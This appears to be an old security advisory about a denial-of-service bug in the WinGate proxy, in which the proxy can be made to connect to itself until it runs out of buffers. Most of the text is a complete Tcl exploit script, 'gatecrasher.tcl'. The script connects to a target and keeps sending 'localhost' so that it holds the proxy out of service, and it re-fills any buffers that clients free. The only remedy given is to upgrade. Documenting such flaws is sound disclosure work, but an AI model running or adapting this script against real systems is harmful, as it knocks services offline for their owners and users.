COMMAND

    wingate

SYSTEMS AFFECTED

    Who ever uses wingate

PROBLEM

    Matt Carothers posted  following.  His  friend discovered a  funny
    bug:

        $ telnet unsecured.wingate.com
        Trying XXX.XX.XX.XXX...
        Connected to XXX.XX.XX.XXX.
        Escape character is '^]'.
        WinGate>localhost
        Connecting to host localhost...Connected

    As you can see, the WinGate  happily connects to itself.  Do  this
    enough times, and ...

        WinGate>localhost
        Connecting to host localhost...Out of buffers

    At this point, the WinGate stops forwarding connections.   Clients
    can still connect but  cannot make use of  it.  Below is  a simple
    TCL exploit to demonstrate the idea.

    #!/usr/local/bin/tclsh

    # gatecrasher.tcl
    #
    # This opens a WinGate and connects it to itself repeatedly until the
    # target machine runs out of buffers and stops forwarding connections.
    # The WinGate will not function as long as the script is running.
    #
    # Credit goes to Chris Snell <texan@hooked.net> for finding the bug.
    #
    # I apologize in advance for not being cool enough to script this is perl.
    #
    # - Matt Carothers <carother@ou.edu>

    set host [lindex $argv 0];
    set port [lindex $argv 1];

    if {![string compare $host ""]} {
      set command [string range $argv0 [expr [string last / $argv0] + 1] end];
      puts stdout "Usage: $command <host> \[port\]";
      exit 1;
    }

    if {![string compare $port ""]} {
      set port 23;
    }

    if {[catch {set sock [socket $host $port]} stuff]} {
      # Could not connect for some reason.  Output an error message and exit.
      puts stdout "$host:$port : $stuff";
      exit 1;
    }

    puts stdout "Connected to $host:$port.  Launching WinGate kill ...";

    set flag 0;

    puts $sock "localhost";
    flush $sock;

    while {[gets $sock line] >= 0} {
      if {[string match "*Connected*" $line]} {
        # We've successfully connected the WinGate to itself.
        # Whee, let's do it again.

        puts $sock "localhost";
        flush $sock;

        puts -nonewline stdout ".";
        flush stdout;

        set flag 0;
      } elseif {[string match "*Out of buffers*" $line]} {
        # The WinGate is now out of buffers.
        # We'll output a message to that effect and keep trying.  This
        # serves as a keep-alive and lets us jump in and fill any buffers
        # freed by clients which disconnect after the attack succeeds.

        if {!$flag} {
          puts stdout "\n*plink*";
          set flag 1;
        }

        puts $sock "localhost";
        flush $sock;
      }
    }

    puts stdout "\nConnection lost.";

SOLUTION

    Make upgrade.